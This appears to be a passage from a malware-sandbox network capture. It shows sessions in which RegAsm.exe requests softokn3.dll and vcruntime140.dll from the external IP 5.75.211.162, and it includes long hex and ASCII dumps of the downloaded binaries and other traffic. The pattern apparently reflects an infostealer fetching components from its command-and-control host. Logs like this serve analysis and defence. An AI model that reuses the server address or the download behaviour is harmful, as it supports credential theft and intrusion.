00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d Data Ascii: r-bahr-hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnm
2024-09-26 18:14:44 UTC	16384	IN	Data Raw: 00 00 04 00 00 00 04 8b 00 10 18 8b 00 10 78 8a 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff Data Ascii: x{\|L@DX}0}}M@4}0}}4M@tXM}0}}XM
2024-09-26 18:14:44 UTC	16384	IN	Data Raw: d9 00 0f bf 45 fc d9 5d e8 d9 45 10 d9 45 e8 d9 c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45 Data Ascii: E]EEE]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u\|_E^UQQMuU]EDB]ED{nt]B]E
2024-09-26 18:14:44 UTC	16384	IN	Data Raw: 03 f7 0f b7 06 83 f8 61 74 05 83 f8 41 75 0f 03 f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b Data Ascii: atAuf;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90ut
2024-09-26 18:14:44 UTC	16384	IN	Data Raw: c0 75 03 8d 41 1c c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc Data Ascii: uAUjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jj
2024-09-26 18:14:44 UTC	16384	IN	Data Raw: 51 56 89 45 fc 89 5f 10 e8 bd 54 02 00 8b 45 f8 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01 Data Ascii: QVE_TEr@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WEN
2024-09-26 18:14:44 UTC	16384	IN	Data Raw: 83 fe 01 75 04 3b d7 74 3a 8b 5d 08 6a 04 59 89 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8 Data Ascii: u;t:]jYMS3R\|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4
2024-09-26 18:14:44 UTC	16384	IN	Data Raw: cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c Data Ascii: UQEVuF\|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv\|
2024-09-26 18:14:44 UTC	16384	IN	Data Raw: e8 97 73 00 00 84 c0 0f 85 d3 00 00 00 8b 5d ec 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83 Data Ascii: s]u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tW

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49729	5.75.211.162	443	2380	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 18:14:45 UTC	197	OUT	GET /softokn3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 18:14:45 UTC	262	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 18:14:45 GMT Content-Type: application/octet-stream Content-Length: 257872 Connection: close Last-Modified: Thursday, 26-Sep-2024 18:14:45 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-26 18:14:45 UTC	16122	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
2024-09-26 18:14:45 UTC	16384	IN	Data Raw: 08 c7 85 f0 fe ff ff 00 00 00 00 8d 85 ec fe ff ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89 Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP\|*USWV1E0=(tM1(
2024-09-26 18:14:46 UTC	16384	IN	Data Raw: 40 04 03 45 dc 56 8d 4d ec 51 50 57 e8 55 9e ff ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8 Data Ascii: @EVMQPWUkWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGP
2024-09-26 18:14:46 UTC	16384	IN	Data Raw: 02 10 88 41 02 0f b6 41 03 d1 e8 8a 80 68 f9 02 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00 Data Ascii: AAhAAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q
2024-09-26 18:14:46 UTC	16384	IN	Data Raw: c0 0f 84 30 07 00 00 83 7b 08 14 0f 84 43 01 00 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23 Data Ascii: 0{C!=P=Qt-=Rt=UG{{G\|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#
2024-09-26 18:14:46 UTC	16384	IN	Data Raw: 5f 5b 5d c3 cc cc 55 89 e5 53 57 56 83 ec 10 a1 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00 Data Ascii: _[]USWV1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=P
2024-09-26 18:14:46 UTC	16384	IN	Data Raw: 77 8b 75 20 85 f6 7e 7a 8b 7d 1c 83 c7 08 c7 45 d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00 Data Ascii: wu ~z}EEGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$\|tu}Z=}]WM}EPVWSut&uGZ
2024-09-26 18:14:46 UTC	16384	IN	Data Raw: 37 ff 75 08 e8 4d 2b 00 00 83 c4 04 85 c0 74 51 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00 Data Ascii: 7uM+tQH8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.
2024-09-26 18:14:46 UTC	16384	IN	Data Raw: 40 00 00 5d c3 b8 00 00 08 00 5d c3 cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15 Data Ascii: @]]USWVu@$xTv4{F4^@KN@P\|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4
2024-09-26 18:14:46 UTC	16384	IN	Data Raw: e4 89 c7 eb 02 31 ff 8b 4d f0 31 e9 e8 15 8c 00 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 Data Ascii: 1M1<^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49730	5.75.211.162	443	2380	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 18:14:47 UTC	201	OUT	GET /vcruntime140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 18:14:47 UTC	261	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 18:14:47 GMT Content-Type: application/octet-stream Content-Length: 80880 Connection: close Last-Modified: Thursday, 26-Sep-2024 18:14:47 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-26 18:14:47 UTC	16123	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"
2024-09-26 18:14:47 UTC	16384	IN	Data Raw: 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c Data Ascii: +t3MNB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F
